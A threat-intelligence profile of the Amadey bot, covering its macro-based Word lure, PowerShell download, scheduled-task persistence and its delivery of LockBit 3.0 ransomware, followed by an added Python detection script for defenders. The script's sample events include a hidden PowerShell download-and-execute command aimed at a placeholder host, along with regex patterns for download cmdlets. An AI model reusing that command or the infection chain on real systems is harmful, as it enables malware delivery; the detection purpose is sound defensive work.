First Known Appearance (Date)
2018
Delivery Method
Distributed via a Word file entitled “Sia_Sim.docx”, which contains a VBA macro. The macro must be initiated by the user, or it can be initiated by an executable that is installed as part of an email attachment.
Operating Methodology
- Once activated, an LNK file is installed and runs a series of PowerShell commands to download and launch the Amadey bot.
- The Amadey bot copies itself into the Temp directory and registers a scheduled task, allowing it to run again after a reboot.
- Once this is complete, it reaches out to the command and control (C2) server to establish communications and receive instructions.
- In the latest version, the bot then downloads and installs LockBit 3.0, in both PowerShell script and .exe form.
- LockBit then infects the host system, changing the desktop to display a ransom message to the user which threatens to release all of the compromised data on the Internet unless the payment is received.
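Two of the steps above leave telemetry a defender can alert on: an Office process launching PowerShell that fetches remote content, and a scheduled task whose action lives in a Temp directory. The detection logic below is an added example, not code from the original profile; the event field names and the sample events are constructed, and it assumes the macro-launched PowerShell appears as a child of the Office process.

```python
import re

# Constructed sample events in a simplified process-creation / task-creation
# shape; the field names are assumptions, not any specific product's schema.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a')\""},
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},                      # benign admin use
    {"type": "task", "taskname": "\\Updater",
     "action": r"C:\Users\alice\AppData\Local\Temp\abc123\svc.exe"},
    {"type": "task", "taskname": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "action": r"C:\Windows\System32\defrag.exe"},               # benign built-in task
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def office_spawned_download(ev):
    """True when an Office process launches PowerShell that pulls remote content."""
    if ev.get("type") != "process":
        return False
    return (basename(ev["parent"]) in OFFICE_APPS
            and basename(ev["image"]) in POWERSHELL
            and bool(DOWNLOAD_MARKERS.search(ev["cmdline"])))

def task_runs_from_temp(ev):
    """True when a newly registered scheduled task executes a file under a Temp directory."""
    return ev.get("type") == "task" and bool(TEMP_DIR.search(ev["action"]))

def triage(events):
    """Return (rule_name, event) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        if office_spawned_download(ev):
            hits.append(("office_to_powershell_download", ev))
        if task_runs_from_temp(ev):
            hits.append(("scheduled_task_from_temp", ev))
    return hits

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS):
        print(rule, "->", ev.get("cmdline") or ev.get("action"))
```

Both rules will also fire on some legitimate installers and macro-heavy documents, so in practice they are best used as correlated signals rather than standalone blocks.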
Other Notes
LockBit 3.0 has been the most commonly used tool in ransomware attacks since the second half of 2022.